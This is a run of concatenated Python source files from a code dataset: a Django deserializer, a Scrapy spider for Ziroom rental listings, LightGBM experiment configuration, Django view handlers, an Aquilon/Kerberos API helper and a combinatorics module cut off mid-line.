options.get(\"encoding\", settings.DEFAULT_CHARSET), strings_only=True\n )\n\n field = Model._meta.get_field(field_name)\n\n # Handle M2M relations\n if field.remote_field and isinstance(field.remote_field, models.ManyToManyRel):\n model = field.remote_field.model\n if hasattr(model._default_manager, 'get_by_natural_key'):\n def m2m_convert(value):\n if hasattr(value, '__iter__') and not isinstance(value, six.text_type):\n return model._default_manager.db_manager(db).get_by_natural_key(*value).pk\n else:\n return force_text(model._meta.pk.to_python(value), strings_only=True)\n else:\n def m2m_convert(v):\n return force_text(model._meta.pk.to_python(v), strings_only=True)\n\n try:\n m2m_data[field.name] = []\n for pk in field_value:\n m2m_data[field.name].append(m2m_convert(pk))\n except Exception as e:\n raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), pk)\n\n # Handle FK fields\n elif field.remote_field and isinstance(field.remote_field, models.ManyToOneRel):\n model = field.remote_field.model\n if field_value is not None:\n try:\n default_manager = model._default_manager\n field_name = field.remote_field.field_name\n if hasattr(default_manager, 'get_by_natural_key'):\n if hasattr(field_value, '__iter__') and not isinstance(field_value, six.text_type):\n obj = default_manager.db_manager(db).get_by_natural_key(*field_value)\n value = getattr(obj, field.remote_field.field_name)\n # If this is a natural foreign key to an object that\n # has a FK/O2O as the foreign key, use the FK value\n if model._meta.pk.remote_field:\n value = value.pk\n else:\n value = model._meta.get_field(field_name).to_python(field_value)\n data[field.attname] = value\n else:\n data[field.attname] = model._meta.get_field(field_name).to_python(field_value)\n except Exception as e:\n raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), field_value)\n else:\n data[field.attname] = None\n\n # Handle all other fields\n else:\n try:\n data[field.name] = field.to_python(field_value)\n except Exception as e:\n raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), field_value)\n\n obj = base.build_instance(Model, data, db)\n yield base.DeserializedObject(obj, m2m_data)\n\n\ndef _get_model(model_identifier):\n \"\"\"\n Helper to look up a model from an \"app_label.model_name\" string.\n \"\"\"\n try:\n return apps.get_model(model_identifier)\n except (LookupError, TypeError):\n raise base.DeserializationError(\"Invalid model identifier: '%s'\" % model_identifier)\n","sub_path":"nac/allianceutils/serializers/json_orminheritancefix/json_orminheritancefix19.py","file_name":"json_orminheritancefix19.py","file_ext":"py","file_size_in_byte":8851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"454738856","text":"import scrapy\nfrom scrapy_redis.spiders import RedisSpider\nfrom scrapy.exceptions import CloseSpider\n\nimport copy\nimport json\nimport time\nfrom urllib.parse import urlparse\n\nfrom ziroom.items import ZiroomItem\n\n\nclass ZiroomSpider(RedisSpider):\n\n name = 'ziroom'\n custom_settings = {\n 'LOG_LEVEL': 'INFO',\n 'COOKIES_ENABLED': False,\n 'REDIRECT_ENABLED': False,\n 'DNS_TIMEOUT': 5,\n 'DOWNLOAD_TIMEOUT': 30,\n 'CONCURRENT_REQUESTS': 64,\n 'CONCURRENT_REQUESTS_PER_IP': 16,\n 'RETRY_HTTP_CODES': [500, 502, 503, 504, 400, 408, 478, 510], # 增加:478 510\n 'LOG_FILE': 'your log folder path' \\\n + time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.log', \n # 日志目录必须已存在\n 'ITEM_PIPELINES': {\n 'ziroom.pipelines.Price': 200, # 识别价格\n 'ziroom.pipelines.SaveMain': 300, # 保存主干信息\n 'ziroom.pipelines.Keeper': 400, # 管家信息\n 'ziroom.pipelines.PaymentAir': 500, # 支付详情 && 空气质量 && 视频地址\n 'ziroom.pipelines.Allocation': 600, # 房屋配置信息\n }\n }\n\n def parse(self, response):\n ''''起始页'''\n url_parsed = urlparse(response.url)\n urls_sel = response.xpath('//dl[@class=\"clearfix zIndex6\"]//\\\n div[@class=\"con\"]/span[@class=\"tag\"][position()>1]/a/@href').extract()\n if not urls_sel:\n self.log_200_abnormal(response, close=True)\n return\n for url in urls_sel:\n yield scrapy.Request(url_parsed.scheme + ':' + url, callback=self.parse_list)\n\n def parse_list(self, response):\n '''列表页\n 例:http://sh.ziroom.com/z/nl/z3-d310104-b611900103.html\n '''\n self.logger.info(f\"crawled 列表页:{response.url}\")\n # 价格信息\n # 在列表页而非详情页匹配价格信息,尽量减少请求价格图片时的 request 数量\n price_png_url = response.xpath('//script[contains(text(), \\\n \"offset_unit\")]').re_first(r'image\":\"//(.+)\",')\n price_positions_str = response.xpath('//script[contains(text(), \\\n \"offset_unit\")]').re_first(r'\"offset\":\\[(.+)\\]\\};')\n if price_png_url and price_positions_str:\n price_png_url = urlparse(response.url).scheme + '://' + price_png_url\n price_positions = list(map(\n lambda x: list(map(int, x.split(','))), \n price_positions_str.strip('[').strip(']').split('],[')\n ))\n else:\n if response.body.decode().find('我们找不到任何与您的搜索条件匹配的结果') == -1:\n self.log_200_abnormal(\n response, position='抓取:列表页', \n statement='未匹配到价格图片url、价格位置字符串', \n close=False\n )\n return\n\n # 提取部分信息(部分信息只能在列表页提取到)\n sel_info = response.xpath('//ul[@id=\"houseList\"]/li')\n city = response.xpath('//span[@id=\"curCityName\"]/text()').extract_first()\n url_parsed = urlparse(response.url)\n for k, v in enumerate(sel_info):\n item = ZiroomItem()\n item['city'] = city\n item['price'] = {\n 'num': None,\n 'payment': v.xpath('div[@class=\"priceDetail\"]/p[@class=\"price\"]\\\n /span[@class=\"gray-6\"]/text()').re_first(r'\\((.+)\\)'),\n 'path': None,\n 'origin_src': price_png_url,\n 'position': price_positions[k],\n 'referer':copy.copy(response.url)\n }\n item['title_thumb'] = {\n 'path': None,\n 'referer': copy.copy(response.url),\n 'origin_src': urlparse(response.url).scheme + '://' + \\\n v.xpath('div[@class=\"img pr\"]/a/img/@_src').re_first(r'^//(.+)')\n }\n item['room_id'] = int(v.xpath('div[@class=\"txt\"]/h3/a/@href')\\\n .re_first(r'/(\\d+)\\.html'))\n item['product'] = v.xpath('div[@class=\"txt\"]/h3/a/text()')\\\n .re_first(r'(\\S+) · .+')\n item['room_name'] = v.xpath('div[@class=\"txt\"]/h3/a/text()')\\\n .re_first(r'\\S+ · (.+)')\n item['room_style'] = v.xpath('div[@class=\"txt\"]/p[@class=\"room_tags \\\n clearfix\"]//span[@class=\"style\"]/text()').extract_first()\n item['is_first_rent'] = v.xpath('div[@class=\"txt\"]/h4/span\\\n [@class=\"green\"][contains(text(), \"首次出租\")]/text()').re_first(r'\\S+')\n item['is_near_subway'] = v.xpath('div[@class=\"txt\"]/p[@class=\"room_tags \\\n clearfix\"]//span[text()=\"离地铁近\"]/text()').extract_first()\n item['is_private_bathroom'] = v.xpath('div[@class=\"txt\"]/\\\n p[@class=\"room_tags clearfix\"]//span[text()=\"独卫\"]/text()').extract_first()\n item['is_private_balcony'] = v.xpath('div[@class=\"txt\"]/\\\n p[@class=\"room_tags clearfix\"]//span[text()=\"独立阳台\"]/text()').extract_first()\n item['heating'] = v.xpath('div[@class=\"txt\"]/p[@class=\\\n \"room_tags clearfix\"]//span[text()=\"集体供暖\" \\\n or text()=\"独立供暖\" or text()=\"中央空调\"]/text()').extract_first()\n url = v.xpath('div[@class=\"txt\"]/h3/a/@href').re_first(r'//(.+html)')\n yield scrapy.Request(\n url_parsed.scheme + '://' + url, \n meta={'item': item}, \n callback=self.parse_detail\n )\n\n # 每一页:page > 1\n if response.url.find('?p=') < 0:\n total_page = response.xpath('//div[@id=\"page\"]/span[contains(text(), \\\n \"共\")]/text()').re_first(r'共(\\d+)页')\n if total_page:\n for v in range(2, int(total_page) + 1):\n # 为每个请求伪造更合理的 referer,而非都以本次请求地址为 referer\n url = response.url + '?p=' + str(v)\n if v == 2:\n referer = copy.copy(response.url)\n else:\n referer = copy.copy(response.url) + '?p=' + str(v-1)\n yield scrapy.Request(\n url, \n meta={'referer': referer}, \n callback=self.parse_list\n )\n\n def parse_detail(self, response):\n '''详情页\n 例(详情):http://www.ziroom.com/z/vr/61230316.html\n 例(支付详情 && 空气质量):http://sh.ziroom.com/detail/info?id=61720868&house_id=60273906\n 例(管家):http://sh.ziroom.com/detail/steward?resblock_id=5011102207629&room_id=\n 61720868&house_id=60273906&ly_name=&ly_phone=\n 例(房屋配置):http://sh.ziroom.com/detail/config?house_id=60273906&id=61720868\n '''\n self.logger.info(f\"crawled 详情页:{response.url}\")\n url_parsed = urlparse(response.url)\n\n # 检测是否正常页面\n room_id = response.xpath('//input[@id=\"room_id\"]/@value').extract_first()\n house_id = response.xpath('//input[@id=\"house_id\"]/@value').extract_first()\n resblock_id = response.xpath('//input[@id=\"resblock_id\"]/@value').extract_first()\n if not(room_id and house_id and resblock_id):\n self.log_200_abnormal(\n response, \n position='抓取:详情页', \n statement=f\"room_id:{room_id} - house_id:{house_id} - resblock_id:{resblock_id}\", \n close=False\n )\n return\n\n # 主信息\n item = copy.deepcopy(response.meta['item'])\n item['room_link'] = copy.copy(response.url)\n item['district'] = response.xpath('//span[@class=\"ellipsis\"]/text()')\\\n .re(r'\\[?(\\S+)\\s+(\\S+)\\]?')\n item['house_id'] = int(house_id)\n item['room_sn'] = response.xpath('//h3[@class=\"fb\"]/text()').re_first(r'\\S+')\n item['room_introduce'] = response.xpath('//p/strong[text()=\"房源介绍:\"]\\\n /parent::node()/text()').extract_first()\n item['community'] = response.xpath('//div[@class=\"node_infor area\"]/\\\n a[last()]/text()').re_first('(.+)租房信息')\n detail_room = response.xpath('//ul[@class=\"detail_room\"]')\n item['subway'] = detail_room.xpath('li[contains(text(), \"交通:\")]/span/text() | \\\n li[contains(text(), \"交通:\")]/span/span/p/text()').re(r'距[\\s\\S+]+米')\n item['rent_type'] = detail_room.xpath('//span[@class=\"icons\"]/text()').extract_first()\n item['area'] = detail_room.xpath('li[contains(text(), \"面积:\")]/text()')\\\n .re_first(r'面积:\\s*(\\S+)\\s+')\n item['floor'] = detail_room.xpath('li[contains(text(), \"楼层:\")]/text()')\\\n .re(r'楼层:\\s*(\\d+)/(\\d+)层')\n item['towards'] = detail_room.xpath('li[contains(text(), \"朝向:\")]/text()')\\\n .re_first(r'朝向:\\s*(\\S+)\\s*')\n item['house_type'] = detail_room.xpath('li[contains(text(), \"户型:\")]/text()')\\\n .re(r'户型:\\s*(\\d+)室(?:(\\d+)厅)?')\n item['rent_status'] = response.xpath('//a[@id=\"zreserve\"]/text()').extract_first()\n img_sel = response.xpath('//div[@id=\"lofslidecontent45\"]//\\\n ul[@class=\"lof-main-wapper\"]/li/a/img')\n if img_sel:\n item['photos'] = []\n for img in img_sel:\n tmp_src = img.xpath('@src').extract_first()\n if tmp_src.find('http:') == -1:\n tmp_src = url_parsed.scheme + '://' + tmp_src.strip('//').strip('/')\n img_info = {\n 'path': None,\n 'thumb_path': None,\n 'title': img.xpath('@title').extract_first(),\n 'origin_src': tmp_src.replace('v180x135', 'v800x600'),\n }\n item['photos'].append(img_info)\n item['map_position'] = response.xpath('//input[@id=\"mapsearchText\"]/\\\n @data-lng | //input[@id=\"mapsearchText\"]/@data-lat').extract()\n roommates_sel = response.xpath('//div[@class=\"greatRoommate\"]/ul/li/div')\n if roommates_sel:\n item['roommates'] = []\n for mate_sel in roommates_sel:\n mate = {}\n mate['gender'] = mate_sel.xpath('parent::node()/@class').re_first(r'\\S+')\n mate['room'] = mate_sel.xpath('div[@class=\"user_top clearfix\"]/\\\n p/text()').extract_first()\n mate['status'] = mate_sel.xpath('div[@class=\"user_top clearfix\"]/\\\n span[@class=\"tags\"]/text()').extract_first()\n mate['sign'] = mate_sel.xpath('div[@class=\"user_center\"]/p[1]/\\\n text()').extract_first()\n mate['jobs'] = mate_sel.xpath('div[@class=\"user_center\"]/p[2]/\\\n span[1]/text()').extract_first()\n mate['check_in_time'] = mate_sel.xpath('div[@class=\"user_bottom\"]/\\\n p/text()').re_first(r'\\S+')\n item['roommates'].append(mate)\n yield item\n\n # 继续抓取管家、房间配置、支付详情、空气\n http_prfix = url_parsed.scheme + '://' + url_parsed.netloc\n keeper_url = http_prfix + f\"/detail/steward?resblock_id={resblock_id}\"\\\n f\"&room_id={room_id}&house_id={house_id}&ly_name=&ly_phone=\"\n payment_and_air_url = http_prfix + f\"/detail/info?id={room_id}&house_id={house_id}\"\n allocation_url = http_prfix + f\"/detail/config?house_id={house_id}&id={room_id}\"\n yield scrapy.Request(\n keeper_url, \n meta={'referer': copy.copy(response.url), 'room_id':int(room_id)}, \n callback=self.parse_keeper\n )\n yield scrapy.Request(\n payment_and_air_url, \n meta={'referer': copy.copy(response.url), 'room_id':int(room_id)}, \n callback=self.parse_payment_air\n )\n yield scrapy.Request(\n allocation_url, \n meta={'referer': copy.copy(response.url), 'room_id':int(room_id)}, \n callback=self.parse_allocation\n )\n\n def parse_keeper(self, response):\n '''管家信息'''\n self.logger.info(f\"crawled 管家信息:{response.url}\")\n try:\n body = response.body.decode()\n body_dict = json.loads(body)\n if body_dict['code'] == 200 and body_dict['message'] == 'success':\n data = body_dict['data']\n item = ZiroomItem()\n item['room_id'] = copy.copy(response.meta['room_id'])\n item['keeper'] = {\n 'keeper_id': int(data['keeperId']),\n 'keeper_name': data['keeperName'],\n 'keeper_phone': data['keeperPhone'],\n 'keeper_header': {\n 'path': None,\n 'origin_src': data['headCorn'],\n 'referer': copy.copy(response.meta['referer']),\n },\n }\n yield item\n else:\n raise UserWarning(f\"管家信息: body_dict['code'] != 200\")\n except Exception as e:\n self.log_200_abnormal(response, position='抓取:管家信息', statement=e, close=False)\n\n def parse_payment_air(self, response):\n '''付款详细信息 && 空气质量'''\n self.logger.info(f\"crawled 付款+空气:{response.url}\")\n try:\n body = response.body.decode()\n body_dict = json.loads(body)\n if body_dict['code'] == 200 and body_dict['message'] == 'success':\n data = body_dict['data']\n item = ZiroomItem()\n item['room_id'] = copy.copy(response.meta['room_id'])\n if 'payment' in data and len(data['payment']):\n url_parsed = urlparse(response.url)\n item['payment'] = {\n 'png': {\n 'origin_src': url_parsed.scheme + ':' + data['payment'][0]['rent'][1], \n 'referer': copy.copy(response.url), \n 'path': None\n },\n 'info': []\n }\n for x in data['payment']:\n pay_tmp = {\n 'period': x['period'],\n 'rent': {'price': None, 'position': x['rent'][2]},\n 'deposit': {'price': None, 'position': x['deposit'][2]},\n 'service_charge': {'price': None, 'position': x['service_charge'][2]},\n }\n item['payment']['info'].append(pay_tmp)\n else:\n item['payment'] = None\n if 'air_part' in data and 'air_quality' in data['air_part']:\n item['air'] = {\n 'result_list': data['air_part']['air_quality'].get('result_list'),\n 'show_info': data['air_part']['air_quality'].get('show_info')\n }\n else:\n item['air'] = None\n item['video_src'] = data.get('vr_video', {}).get('video_url')\n yield item\n else:\n raise UserWarning(f\"付款详细信息: body_dict['code'] != 200\")\n except Exception as e:\n self.log_200_abnormal(response, position='抓取:付款详细信息', statement=e, close=False)\n\n def parse_allocation(self, response):\n '''房屋配置'''\n self.logger.info(f\"crawled 房屋配置:{response.url}\")\n try:\n body = response.body.decode()\n body_dict = json.loads(body)\n if body_dict['code'] == 200 and body_dict['message'] == 'success':\n data = body_dict['data']\n item = ZiroomItem()\n item['room_id'] = copy.copy(response.meta['room_id'])\n item['allocation'] = data\n yield item\n else:\n raise UserWarning(f\"房屋配置: body_dict['code'] != 200\")\n except Exception as e:\n self.log_200_abnormal(response, position='抓取:房屋配置', statement=e, close=False)\n\n def log_200_abnormal(self, response, *, position='未知', statement='', close=True):\n ''''记录疑似非正常页面:response.status_code==200,但是返回的页面内容貌似不是我们想要的内容'''\n self.logger.critical(f\"发现疑似非正常页面\")\n self.logger.critical(f\"url : {response.url}\")\n self.logger.critical(f\"position : {position}\")\n self.logger.critical(f\"statement : {statement}\")\n self.logger.critical(f\"response.body : {response.body.decode()}\")\n if close:\n raise CloseSpider(f\"发现疑似非正常页面\")\n","sub_path":"ziroom/spiders/ziroom.py","file_name":"ziroom.py","file_ext":"py","file_size_in_byte":17117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258852269","text":"from sacred import Ingredient\ndata_ingredient = Ingredient('data')\nfeature_ingredient = Ingredient('feature')\ntrain_ingredient = Ingredient('train')\n\n# My imports\nfrom lightgbm import LGBMRegressor\nfrom src.models.experiments.functions import *\nfrom src.features.transformers import *\nfrom src.models.functions import *\nfrom src.models.experiments.train_model import *\nfrom src.features.feature_selection import FeatureSelector\nfrom src.data.extracts import irregular_cols, cts_cols\nfrom src.models.optimizers import old_params\n\n\n# Feature Generation\n@feature_ingredient.config\ndef feature_config():\n # Use RFECV feature selection\n feature_selction = False\n\n # Num measurements in the last n_hours\n num_measurements = False\n\n # Moments\n moments = False\n moment_lookback = 6\n\n # Signature options\n columns = False\n lookback = False\n lookback_method = 'mean'\n individual = False\n order, logsig, leadlag, addtime, cumsum, pen_off, append_zero = 2, True, False, False, False, False, False\n\n # Cumsum signatures\n cumsum_columns = False\n cumsum_addtime = False\n cumsum_lookback = 10\n cumsum_order = 3\n\n # Other\n extra_moments = False\n add_max, add_min = False, False\n max_min_lookback = 5\n drop_count = False\n\n # For submission\n last_only = False\n\n@feature_ingredient.capture\ndef generate_features(_run, feature_selection,\n num_measurements, moments, moment_lookback,\n columns, lookback, lookback_method, individual, order, logsig, leadlag, addtime, cumsum, pen_off, append_zero,\n extra_moments, add_max, add_min, max_min_lookback, drop_count,\n last_only):\n # Get data\n df, labels_binary, labels_utility = load_munged_data()\n df.drop('hospital', axis=1, inplace=True)\n\n # Get number of measurements taken in a fixed time window\n counts_24hrs = None\n if num_measurements is not False:\n cols = [x for x in df.columns if '_count' in x]\n counts_24hrs = GetNumMeasurements(lookback=num_measurements).transform(df[cols])\n counts_24hrs = numpy_to_named_dataframe(counts_24hrs, df.index, 'cntxhrs')\n\n # Moments\n moments_frame = None\n if moments is not False:\n moments_frame = AddMoments(moments=moments, lookback=moment_lookback, last_only=last_only).transform(df)\n moments_frame = numpy_to_named_dataframe(moments_frame, df.index, 'Moments')\n moments_frame.columns = ['{}_moment_{}'.format(col, i) for i in range(2, moments + 1) for col in df.columns]\n\n # Add signatures\n signatures = None\n if columns is not False:\n signatures = add_signatures(df, columns, individual, lookback, lookback_method,\n order, logsig, leadlag, addtime, cumsum, pen_off, append_zero, last_only=last_only)\n signatures = numpy_to_named_dataframe(signatures, df.index, 'Signatures')\n\n # Get sampling rate rather than absolute number for the count column.\n data = GetRateOfLaboratorySampling().transform(df)\n\n # Get extra moments\n new_moments = None\n if extra_moments is not False:\n cols = ['HCO3', 'HR']\n new_moments = AddMoments(moments=extra_moments, start=4, force_compute=True).transform(df[cols])\n new_moments = pd.DataFrame(index=df.index, data=new_moments)\n new_moments.columns = ['{}_moment_{}'.format(col, i) for i in range(4, extra_moments + 1) for col in cols]\n\n # Max and min\n max_vals = None\n if add_max is not False:\n max_vals = GetStatistic(statistic='max', lookback=max_min_lookback, columns=cts_cols).transform(df[cts_cols])\n max_vals = pd.DataFrame(index=df.index, data=max_vals, columns=['{}_max'.format(x) for x in cts_cols])\n\n min_vals = None\n if add_min is not False:\n min_vals = GetStatistic(statistic='min', lookback=max_min_lookback, columns=cts_cols).transform(df[cts_cols])\n min_vals = pd.DataFrame(index=df.index, data=min_vals, columns=['{}_min'.format(x) for x in cts_cols])\n\n # Create data ready for insertion\n # df.drop([x for x in df.columns if '_count' in x], axis=1, inplace=True)\n df = pd.concat([data, counts_24hrs, moments_frame, signatures, new_moments, max_vals, min_vals], axis=1)\n # data = np.concatenate([x for x in (data, counts_24hrs, moments_frame, signatures) if x is not None], axis=1)\n # df = pd.DataFrame(index=df.index, data=data)\n # df = remove_useless_columns(df)\n\n # Try RFECV\n if feature_selection is not False:\n if feature_selection == 'from_save':\n features = load_pickle(MODELS_DIR + '/feature_selection/rfecv_test.pickle')\n df = df[[x for x in features if x in df.columns]]\n else:\n fs = FeatureSelector(verbose=1).fit(df, labels_utility)\n df = fs.transform(df)\n\n # Drop the count col\n if drop_count:\n df.drop([x for x in df.columns if '_count' in x], axis=1, inplace=True)\n\n # Print info about the shape\n print(df.shape)\n print(df.columns)\n\n # Add to run\n _run.df, _run.labels_binary, _run.labels_utility = df, labels_binary, labels_utility\n\n # Save for checking solution runs\n save_pickle(df, DATA_DIR + '/processed/dataframes/df_full.pickle')\n\n # For training early time\n # df = df[df.columns[0:40]]\n # print('THIS IS THE ACTUAL SHAPE', df.shape)\n\n return df\n\n# TRAIN\n@train_ingredient.config\ndef train_config():\n gs_params = False\n n_estimators = 100\n learning_rate = 0.1\n\n@train_ingredient.capture\ndef train_model(_run, gs_params, n_estimators, learning_rate):\n # Load\n df, labels_binary, labels_utility = _run.df, _run.labels_binary, _run.labels_utility\n\n # Get the cross validated folds\n cv_iter = CustomStratifiedGroupKFold(n_splits=5).split(df, labels_binary, groups=df.index.get_level_values('id'))\n\n # Setup the training loop function\n if gs_params is not False:\n params = load_pickle(MODELS_DIR + '/parameters/lgb/random_grid_fullds.pickle')\n # params = load_pickle(MODELS_DIR + '/parameters/lgb/random_grid.pickle')\n print(params)\n clf = LGBMRegressor(n_estimators=n_estimators, learning_rate=learning_rate).set_params(**params)\n else:\n clf = LGBMRegressor(**old_params).set_params(**{'n_estimators': n_estimators, 'learning_rate': learning_rate})\n predictions = cross_val_predict_to_series(clf, df, labels_utility, cv=cv_iter, n_jobs=-1)\n\n # Perform thresholding\n binary_preds, scores, _ = ThresholdOptimizer(budget=100, labels=labels_binary, preds=predictions).cross_val_threshold(cv_iter, parallel=True, give_cv_num=True)\n\n # Log info\n ppprint('AVERAGE SCORE {:.3f}'.format(np.mean(scores)), color='green')\n _run.log_scalar('utility_score', np.mean(scores))\n save_pickle(predictions, _run.save_dir + '/probas.pickle')\n\n","sub_path":"CanIgetyoursignature/physionet_submission_6/src/models/experiments/ingredients.py","file_name":"ingredients.py","file_ext":"py","file_size_in_byte":6768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"641866240","text":"#!/usr/bin/env python3\n# coding=UTF-8\nimport simplejson\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.template.loader import get_template\n\nfrom Server import Server, API, LogSys\n\n\ndef result_uiauto_details(request):\n '''\n 用于判断编辑条件\n :param request:\n :return:\n '''\n LogSys.logInfo('Request:{0}'.format(request))\n key = 0\n if request.GET['user'] == 'visitor':\n key = 0\n elif request.GET['user'] == 'admin':\n key = 1\n detail = API.api_auto_detail(request)\n detail_dict = simplejson.loads(detail)\n reason = Server.getRealReason(request)\n if detail_dict['code'] != 0:\n context = {'person': None}\n else:\n context = {'person': detail_dict, 'reason': simplejson.loads(reason), 'key': key}\n LogSys.logInfo('Result:{0}'.format(context))\n return render(request, 'uiAutoDetail.html', context)\n\ndef result_uiauto_list(request):\n '''\n 用于判断编辑条件\n :param request:\n :return:\n '''\n LogSys.logInfo('Request:{0}'.format(request))\n listRun = API.api_auto_list(request)\n listRun_dict = simplejson.loads(listRun)\n if listRun_dict['code'] != 0:\n context = {'person': None}\n else:\n context = {'person': listRun_dict}\n LogSys.logInfo('Result:{0}'.format(context))\n return render(request, 'uiAutoList.html', context)\n\ndef result_apicheck_list(request):\n '''\n :param request:\n :return:\n '''\n LogSys.logInfo('API:web/result/api/monitor')\n LogSys.logInfo('Request:{0}'.format(request))\n listRun = API.api_server_list(request)\n listRun_dict = simplejson.loads(listRun)\n if listRun_dict['code'] != 0:\n context = {'person': None}\n else:\n context = {'person': listRun_dict}\n LogSys.logInfo('Result:{0}'.format(context))\n return render(request, 'apiMonitor.html', context)\n\ndef result_api_detail(request):\n '''\n :param request:\n :return:\n '''\n LogSys.logInfo('API:web/result/api/detail')\n LogSys.logInfo('Request:{0}'.format(request))\n listRun = API.api_server_detail(request)\n listRun_dict = simplejson.loads(listRun)\n if listRun_dict['code'] != 0:\n context = {'person': None}\n else:\n context = {'person': listRun_dict}\n LogSys.logInfo('Result:{0}'.format(context))\n return render(request, 'APIDetail.html', context)","sub_path":"Web/routehtml.py","file_name":"routehtml.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"51365464","text":"import logging\nimport requests\nimport common\nimport subprocess\n\nfrom requests.packages.urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nfrom requests_kerberos import HTTPKerberosAuth\n\n\nMAKE_SUFFIX = \"/host/{0}/command/make\"\nMANAGE_SUFFIX = \"/host/{0}/command/manage?hostname={0}&{1}={2}&force=true\"\n\nlogger = logging.getLogger(__name__)\n\n\ndef verify_kerberos_ticket():\n logger.info(\"Checking for valid Kerberos Ticket\")\n\n if subprocess.call(['klist', '-s']) == 1:\n logger.warn(\"No ticket found / expired. Obtaining new one\")\n kinit_cmd = ['kinit', '-k']\n\n if common.config.get(\"kerberos\", \"suffix\") != \"\":\n kinit_cmd.append(common.config.get(\"kerberos\", \"suffix\"))\n\n subprocess.call(kinit_cmd)\n\n if subprocess.call(['klist', '-s']) == 1:\n raise Exception(\"Failed to obtain valid Kerberos ticket\")\n\n logger.info(\"Kerberos ticket success\")\n return True\n\n\ndef aq_make(hostname, personality=None, osversion=None, archetype=None, osname=None):\n logger.info(\"Attempting to make templates for \" + hostname)\n\n # strip out blank parameters and hostname\n params = {k: v for k, v in locals().items() if v is not None and k != \"hostname\"}\n\n # join remaining parameters to form url string\n params = [k + \"=\" + v for k, v in params.items()]\n\n url = common.config.get(\"aquilon\", \"url\") + MAKE_SUFFIX.format(hostname) + \"?\" + \"&\".join(params)\n\n verify_kerberos_ticket()\n\n s = requests.Session()\n s.verify = \"/etc/grid-security/certificates/\"\n retries = Retry(total=5, backoff_factor=0.1, status_forcelist=[503])\n s.mount('https://', HTTPAdapter(max_retries=retries))\n\n response = s.post(url, auth=HTTPKerberosAuth())\n\n if response.status_code != 200:\n logger.error(\"Aquilon make failed: \" + str(response.text))\n logger.error(url)\n raise Exception(\"Aquilon make failed\")\n\n logger.info(\"Successfully made templates\")\n\n\ndef aq_manage(hostname, env_type, env_name):\n logger.info(\"Attempting to manage %s to %s %s\" % (hostname, env_type, env_name))\n\n url = common.config.get(\"aquilon\", \"url\") + MANAGE_SUFFIX.format(hostname, env_type, env_name)\n\n verify_kerberos_ticket()\n\n s = requests.Session()\n s.verify = \"/etc/grid-security/certificates/\"\n retries = Retry(total=5, backoff_factor=0.1, status_forcelist=[503])\n s.mount('https://', HTTPAdapter(max_retries=retries))\n\n response = s.post(url, auth=HTTPKerberosAuth())\n\n if response.status_code != 200:\n logger.error(\"Aquilon manage failed: \" + str(response.text))\n logger.error(url)\n raise Exception(\"Aquilon manage failed\")\n\n logger.info(\"Successfully managed machine\")\n\n\ndef vm_create(hostname, domain=None, sandbox=None, personality=None, osversion=None, archetype=None, osname=None):\n if domain:\n aq_manage(hostname, \"domain\", domain)\n else:\n aq_manage(hostname, \"sandbox\", sandbox)\n\n aq_make(hostname, personality, osversion, archetype, osname)\n\n\ndef vm_delete(hostname):\n # manage the host back to prod\n aq_manage(hostname, \"domain\", \"prod\")\n\n # reset personality etc ...\n aq_make(hostname, \"nubesvms\", \"6x-x86_64\", \"ral-tier1\", \"sl\")\n\n","sub_path":"OpenStack-Rabbit-Consumer/usr/local/bin/aq_api.py","file_name":"aq_api.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"71864688","text":"import sys\r\n\r\ndef ncr(n, r):\r\n \"\"\"\r\n Beregner antall mulige uordnede utvalg\r\n uten tilbakelegging med størrelse r \r\n individer fra en populasjon på n individer\r\n \"\"\"\r\n if r == 0 and n == 0:\r\n return 1\r\n\r\n if n == 0 and r != 0:\r\n return 0\r\n\r\n\r\n T = 1\r\n N = 1\r\n try:\r\n for k in range(r):\r\n T = T*(n - k)\r\n N = N*(k + 1)\r\n return T/N\r\n except OverflowError:\r\n print(\" \")\r\n print(\" \")\r\n print(\"Overflow! The function ncr in kombinatorikk \"+ \\\r\n \"cannot handle such large input n and r\")\r\n print(\"Please try some smaller input\")\r\n print(\" \")\r\n raise\r\n \r\n return int(T/N)\r\n\r\ndef npr(n, r):\r\n \"\"\"\r\n Beregner antall mulige ordnede utvalg uten\r\n tilbakelegging med størrelse r individer\r\n fra en populasjon på n individer\r\n \"\"\"\r\n P = n\r\n for k in range(1, r):\r\n P = P*(n - k)\r\n return P\r\n \r\n\r\nif __name__ == \"__main__\":\r\n\r\n \r\n assert ncr(0, 0) == 1\r\n assert ncr(1, 0) == 1\r\n assert ncr(0, 1) == 0\r\n assert ncr(1, 1) == 1\r\n\r\n assert npr(5, 4) == 5*4*3*2\r\n assert npr(10, 5) == 10*9*8*7*6\r\n assert npr(1200, 3) == 1200*1199*1198\r\n\r\n \r\n for i in range(1, 1000):\r\n try:\r\n assert ncr(i, 1) == i\r\n except AssertionError:\r\n print(f\"error: got ncr({i}, 1) = {ncr(i, 1)}\")\r\n \r\n try:\r\n k = i + 1\r\n assert ncr(k, 2) == int(i*(i + 1)/2)\r\n except AssertionError:\r\n print('got an error!')\r\n sys.exit(0)\r\n\r\n \r\n for i in range(int(1E10), int(1.00001E10)):\r\n try:\r\n assert ncr(i, 1) == i\r\n except AssertionError:\r\n print(f\"error: got ncr({i}, 1) = {ncr(i, 1)}\")\r\n \r\n try:\r\n k = i + 1\r\n assert ncr(k, 2) == int(i*(i + 1)/2)\r\n except AssertionError:\r\n print('got an error!')\r\n sys.exit(0)\r\n\r\n # ncr(7.5E9, 35) = 4.1E+305\r\n # r = 35 is largest possible r for this n\r\n print(\"%g\" % ncr(int(7.5E9), 35))\r\n\r\n\r\n for k in range(19):\r\n # print some rows in pascals triangle\r\n for i in range(k + 1):\r\n print(ncr(k, i), end=' ')\r\n print(\" 